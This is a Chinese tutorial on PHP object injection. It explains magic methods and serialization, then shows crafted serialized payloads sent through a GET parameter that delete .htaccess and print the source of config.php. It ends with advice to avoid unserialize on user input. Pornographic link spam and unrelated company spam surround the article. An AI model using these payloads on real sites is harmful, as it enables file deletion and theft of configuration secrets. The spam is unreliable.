电脑知识|欧美黑人一区二区三区|软件|欧美黑人一级爽快片淫片高清|系统|欧美黑人狂野猛交老妇|数据库|服务器|编程开发|网络运营|知识问答|技术教程文章 - 好吧啦网

您的位置:首頁技術文章
文章詳情頁

一文帶你搞懂PHP對象注入

瀏覽:198日期:2022-06-06 09:55:37
目錄
  • 背景
  • 漏洞案例
  • PHP類和對象
  • php magic方法
  • php對象序列化
  • 序列化magic函數
  • php對象注入
  • 常見的注入點
  • 其他的利用方法
  • 如何利用或者避免這個漏洞
  • 結論

背景

php對象注入是一個非常常見的漏洞,這個類型的漏洞雖然有些難以利用,但仍舊非常危險,為了理解這個漏洞,請讀者具備基礎的php知識。

漏洞案例

如果你覺得這是個渣渣洞,那么請看一眼這個列表,一些被審計狗挖到過該漏洞的系統,你可以發現都是一些耳熟能詳的玩意(就國外來說)

  • WordPress 3.6.1
  • Magento 1.9.0.1
  • Joomla 3.0.3
  • Ip board 3.3.5

除此之外等等一堆系統,八成可能大概在這些還有其他的php程序中還有很多這種類型的漏洞,所以不妨考慮坐下喝杯咖啡并且試著去理解這篇文章。

PHP類和對象

類和變量是非常容易理解的php概念,打個比方,下面的代碼在一個類中定義了一個變量和一個方法。

#!php
<?php
class TestClass
{
    // 一個變量
    public $variable = "This is a string";
    // 一個簡單的方法
    public function PrintVariable()
    {
echo $this->variable;
    }
}

// 創建一個對象
$object = new TestClass();
// 調用一個方法
$object->PrintVariable();
?>

php magic方法

php類可能會包含一些特殊的函數叫magic函數,magic函數命名是以符號“__”開頭的,比如 __construct, __destruct, __toString, __sleep, __wakeup 和其他的一些玩意。

這些函數在某些情況下會自動調用,比如:

__construct 當一個對象創建時調用 (constructor) __destruct 當一個對象被銷毀時調用 (destructor) __ toString當一個對象被當作一個字符串使用

為了更好的理解magic方法是如何工作的,讓我們添加一個magic方法在我們的類中。

#!php
<?php
class TestClass
{
    // 一個變量
    public $variable = "This is a string";

    // 一個簡單的方法
    public function PrintVariable()
   {
echo $this->variable . "<br />";
    }

    // Constructor
    public function __construct()
   {
echo "__construct <br />";
    }

    // Destructor
    public function __destruct()
   {
echo "__destruct <br />";
    }

    // Call
    public function __toString()
   {
return "__toString<br />";
    }
}
// 創建一個對象
//  __construct會被調用
$object = new TestClass();
// 創建一個方法
//  "This is a string" 這玩意會被輸出
$object->PrintVariable();
// 對象被當作一個字符串
//  __toString 會被調用
echo $object;
// End of PHP script
// php腳本要結束了, __destruct會被調用
?>

這個腳本會輸出這狗樣:

__construct 
This is a string 
__toString 
__destruct

php對象序列化

php允許保存一個對象方便以后重用,這個過程被稱為序列化,打個比方,你可以保存一個包含著用戶信息的對象方便等等重用。

為了序列化一個對象,你需要調用 “serialize”函數,函數會返回一個字符串,當你需要用到這個對象的時候可以使用“unserialize”去重建對象。

讓我們在序列化丟進那個例子,看看序列化張什么樣。

</pre>
<pre>
#!php
<?php
// 某類
class User
{
    // 類數據
    public $age = 0;
    public $name = "";

    // 輸出數據
    public function PrintData()
    {
echo "User " . $this->name . " is " . $this->age
     . " years old. <br />";
    }
}
// 創建一個對象
$usr = new User();
// 設置數據
$usr->age = 20;
$usr->name = "John";
// 輸出數據
$usr->PrintData();
// 輸出序列化之后的數據
echo serialize($usr);
?>

它會輸出

User John is 20 years old. 
O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

你可以看到序列化之后的數據中 有 20和John,其中沒有任何跟類有關的東西,只有其中的數據被數據化。

為了使用這個對象,我們用unserialize重建對象。

#!php
<?php
// 某類
class User
{
    // Class data
    public $age = 0;
    public $name = "";

    // Print data
    public function PrintData()
    {
echo "User " . $this->name . " is " . $this->age . " years old. <br />";
    }
}
// 重建對象
$usr = unserialize("O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}");

// 調用PrintData 輸出數據
$usr->PrintData();
?>

這會輸出

User John is 20 years old

序列化magic函數

magic函數constructor (__construct)和 destructor (__destruct) 是會在對象創建或者銷毀時自動調用,其他的一些magic函數會在serialize 或者 unserialize的時候被調用。

__sleep magic方法在一個對象被序列化的時候調用。__wakeup magic方法在一個對象被反序列化的時候調用。

注意 __sleep 必須返回一個數組與序列化的變量名。

#!php
<?php
class Test
{
    public $variable = "BUZZ";
    public $variable2 = "OTHER";

    public function PrintVariable()
   {
echo $this->variable . "<br />";
    }

    public function __construct()
   {
echo "__construct<br />";
    }

    public function __destruct()
   {
echo "__destruct<br />";
    }

    public function __wakeup()
   {
echo "__wakeup<br />";
    }

    public function __sleep()
   {
echo "__sleep<br />";
return array("variable", "variable2");
    }
}

// 創建一個對象,會調用 __construct
$obj = new Test();

// 序列化一個對象,會調用 __sleep
$serialized = serialize($obj);

//輸出序列化后的字符串
print "Serialized: " . $serialized . <br />";
// 重建對象,會調用 __wakeup
$obj2 = unserialize($serialized);

//調用 PintVariable, 會輸出數據 (BUZZ)
$obj2->PrintVariable();
// php腳本結束,會調用 __destruct 
?>

這玩意會輸出:

__construct 
__sleep 
Serialized: O:4:"Test":2:
{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";} 
__wakeup 
BUZZ 
__destruct 
__destruct

你可以看到,我們創建了一個對象,序列化了它(然后__sleep被調用),之后用序列化對象重建后的對象創建了另一個對象,接著php腳本結束的時候兩個對象的__destruct都會被調用。

php對象注入

現在我們理解了序列化是如何工作的,我們該如何利用它?事實上,利用這玩意的可能性有很多種,關鍵取決于應用程序的流程與,可用的類,與magic函數。

記住序列化對象的值是可控的。

你可能會找到一套web程序的源代碼,其中某個類的__wakeup 或者 __destruct and其他亂七八糟的函數會影響到web程序。

打個比方,我們可能會找到一個類用于臨時將日志儲存進某個文件,當__destruct被調用時,日志文件會被刪除。然后代碼張這狗樣。

#!php
<?php 

class LogFile
{
    // log文件名
    public $filename = "error.log";

    // 某代碼,儲存日志進文件
    public function LogData($text)
   {
echo "Log some data: " . $text . "<br />";
file_put_contents($this->filename, $text, FILE_APPEND);
    }

    // Destructor 刪除日志文件
    public function __destruct()
   {
echo "__destruct deletes "" . $this->filename . "" file. <br />";
unlink(dirname(__FILE__) . "/" . $this->filename);
    }
}
?>

某例子關于如何使用這個類

#!php
<?php
include "logfile.php";

// 創建一個對象
$obj = new LogFile();

// 設置文件名和要儲存的日志數據
$obj->filename = "somefile.log";
$obj->LogData("Test");

// php腳本結束啦,__destruct被調用,somefile.log文件被刪除。
?>

在其他的腳本,我們可能又恰好找到一個調用“unserialize”函數的,并且恰好變量是用戶可控的,又恰好是$_GET之類的什么玩意的。

#!php
<?php
include "logfile.php";

// ... 一些狗日的代碼和 LogFile 類 ...
// 簡單的類定義
class User
{
    // 類數據
    public $age = 0;
    public $name = "";

    // 輸出數據
    public function PrintData()
   {
echo "User " . $this->name . " is " . $this->age . " years old. <br />";
    }
}

// 重建 用戶輸入的 數據
$usr = unserialize($_GET["usr_serialized"]);
?>

你看,這個代碼調用了 “LogClass” 類,并且有一個 “unserialize” 值是我們可以注入的。

所以構造類似這樣的東西:

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

究竟發生了什么呢,因為輸入是可控的,所以我們可以構造任意的序列化對象,比如:

#!php
<?php
$obj = new LogFile();
$obj->filename = ".htaccess";
echo serialize($obj) . "<br />";
?>

這個會輸出

O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";} 
__destruct deletes ".htaccess" file.

現在我們將構造過后的序列化對象發送給剛才的腳本:

script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess”;}

這會輸出

__destruct deletes ".htaccess" file.

現在 .htaccess 已經被干掉了,因為腳本結束時 __destruct會被調用。不過我們已經可以控制“LogFile”類的變量啦。

這就是漏洞名稱的由來:變量可控并且進行了unserialize操作的地方注入序列化對象,實現代碼執行或者其他坑爹的行為。

雖然這不是一個很好的例子,不過我相信你可以理解這個概念,unserialize自動調用 __wakeup 和 __destruct,接著攻擊者可以控制類變量,并且攻擊web程序。

常見的注入點

先不談 __wakeup 和 __destruct,還有一些很常見的注入點允許你利用這個類型的漏洞,一切都是取決于程序邏輯。

打個比方,某用戶類定義了一個__toString為了讓應用程序能夠將類作為一個字符串輸出(echo $obj) ,而且其他類也可能定義了一個類允許__toString讀取某個文件。

#!php
<?php 
// … 一些include ...
class FileClass
{
    // 文件名
    public $filename = "error.log";

    //當對象被作為一個字符串會讀取這個文件
    public function __toString()
    {
return file_get_contents($this->filename);
    }
}

// Main User class
class User
{
    // Class data
    public $age = 0;
    public $name = "";

    // 允許對象作為一個字符串輸出上面的data
    public function __toString()
   {
return "User " . $this->name . " is " . $this->age . " years old. <br />";
    }
}

// 用戶可控
$obj = unserialize($_GET["usr_serialized"]);
// 輸出 __toString
echo $obj;
?>

so,我們構造url

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

再想想,如果我們用序列化調用 FileClass呢

我們創建利用代碼

#!php
<?php
$fileobj = new FileClass();
$fileobj->filename = "config.php";
echo serialize($fileobj);

?>

接著用生成的exp注入url

script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php”;}

接著網頁會輸出 config.php的源代碼

#!php
<?php
     $private_data = 'MAGIC';
?>

ps:我希望這讓你能夠理解。

其他的利用方法

可能其他的一些magic函數海存在利用點:比如__call 會在對象調用不存在的函數時調用,__get 和 __set會在對象嘗試訪問一些不存在的類,變量等等時調用。

不過需要注意的是,利用場景不限于magic函數,也有一些方式可以在一半的函數中利用這個漏洞,打個比方,一個模塊可能定義了一個叫get的函數進行一些敏感的操作,比如訪問數據庫,這就可能造成sql注入,取決于函數本身的操作。

如何利用或者避免這個漏洞

別在任何用戶可控的地方使用“unserialize”,可以考慮“json_decode“

結論

雖然很難找到而且很難利用,但是這真的真的很嚴重,可以導致各種各樣的漏洞。

到此這篇關于一文帶你搞懂PHP對象注入的文章就介紹到這了,更多相關PHP對象注入內容請搜索以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持!

標簽: PHP
相關文章:
主站蜘蛛池模板: 道达尔润滑油-食品级润滑油-道达尔导热油-合成导热油,深圳道达尔代理商合-深圳浩方正大官网 | 新材料分散-高速均质搅拌机-超声波分散混合-上海化烁智能设备有限公司 | 天津拓展_天津团建_天津趣味运动会_天津活动策划公司-天津华天拓展培训中心 | (中山|佛山|江门)环氧地坪漆,停车场地板漆,车库地板漆,聚氨酯地板漆-中山永旺地坪漆厂家 | 帽子厂家_帽子工厂_帽子定做_义乌帽厂_帽厂_制帽厂_帽子厂_浙江高普制帽厂 | 气动机械手-搬运机械手-气动助力机械手-山东精瑞自动化设备有限公司 | 净化板-洁净板-净化板价格-净化板生产厂家-山东鸿星新材料科技股份有限公司 | 云南外加剂,云南速凝剂,云南外加剂代加工-普洱澜湄新材料科技有限公司 | 蚂蚁分类信息系统 - PHP同城分类信息系统 - MayiCMS | 防爆大气采样器-防爆粉尘采样器-金属粉尘及其化合物采样器-首页|盐城银河科技有限公司 | 消电检公司,消电检价格,北京消电检报告-北京设施检测公司-亿杰(北京)消防工程有限公司 | 立式硫化罐-劳保用品硫化罐-厂家直销-山东鑫泰鑫硫化罐厂家 | 土壤墒情监测站_土壤墒情监测仪_土壤墒情监测系统_管式土壤墒情站-山东风途物联网 | 北京发电车出租-发电机租赁公司-柴油发电机厂家 - 北京明旺盛安机电设备有限公司 | 珠海白蚁防治_珠海灭鼠_珠海杀虫灭鼠_珠海灭蟑螂_珠海酒店消杀_珠海工厂杀虫灭鼠_立净虫控防治服务有限公司 | 沟盖板_复合沟盖板厂_电力盖板_树脂雨水篦子-淄博拜斯特 | 哲力实业_专注汽车涂料汽车漆研发生产_汽车漆|修补油漆品牌厂家 长沙一级消防工程公司_智能化弱电_机电安装_亮化工程专业施工承包_湖南公共安全工程有限公司 | 并网柜,汇流箱,电控设备,中高低压开关柜,电气电力成套设备,PLC控制设备订制厂家,江苏昌伟业新能源科技有限公司 | 泰国试管婴儿_泰国第三代试管婴儿费用|成功率|医院—新生代海外医疗 | 上海电子秤厂家,电子秤厂家价格,上海吊秤厂家,吊秤供应价格-上海佳宜电子科技有限公司 | 产业规划_产业园区规划-产业投资选址及规划招商托管一体化服务商-中机院产业园区规划网 | 成都顶呱呱信息技术有限公司-贷款_个人贷款_银行贷款在线申请 - 成都贷款公司 | 氢氧化钙设备_厂家-淄博工贸有限公司 | 盐城网络公司_盐城网站优化_盐城网站建设_盐城市启晨网络科技有限公司 | 一体化预制泵站-一体化提升泵站-一体化泵站厂家-山东康威环保 | 办公室家具公司_办公家具品牌厂家_森拉堡办公家具【官网】 | 蓄电池回收,ups电池后备电源回收,铅酸蓄电池回收,机房电源回收-广州益夫铅酸电池回收公司 | 杭州公司变更法人-代理记账收费价格-公司注销代办_杭州福道财务管理咨询有限公司 | 多米诺-多米诺世界纪录团队-多米诺世界-多米诺团队培训-多米诺公关活动-多米诺创意广告-多米诺大型表演-多米诺专业赛事 | 螺杆式冷水机-低温冷水机厂家-冷冻机-风冷式-水冷式冷水机-上海祝松机械有限公司 | 不锈钢管件(不锈钢弯头,不锈钢三通,不锈钢大小头),不锈钢法兰「厂家」-浙江志通管阀 | 恒温恒湿试验箱_高低温试验箱_恒温恒湿箱-东莞市高天试验设备有限公司 | 广州中央空调回收,二手中央空调回收,旧空调回收,制冷设备回收,冷气机组回收公司-广州益夫制冷设备回收公司 | 英语词典_成语词典_日语词典_法语词典_在线词典网 | 亚洲工业智能制造领域专业门户网站 - 亚洲自动化与机器人网 | 干洗加盟网-洗衣店品牌排行-干洗设备价格-干洗连锁加盟指南 | 天然气分析仪-液化气二甲醚分析仪|传昊仪器 | 仓储货架_南京货架_钢制托盘_仓储笼_隔离网_环球零件盒_诺力液压车_货架-南京一品仓储设备制造公司 | 高考志愿规划师_高考规划师_高考培训师_高报师_升学规划师_高考志愿规划师培训认证机构「向阳生涯」 | 济南菜鸟驿站广告|青岛快递车车体|社区媒体-抖音|墙体广告-山东揽胜广告传媒有限公司 | 塑料造粒机「厂家直销」-莱州鑫瑞迪机械有限公司 |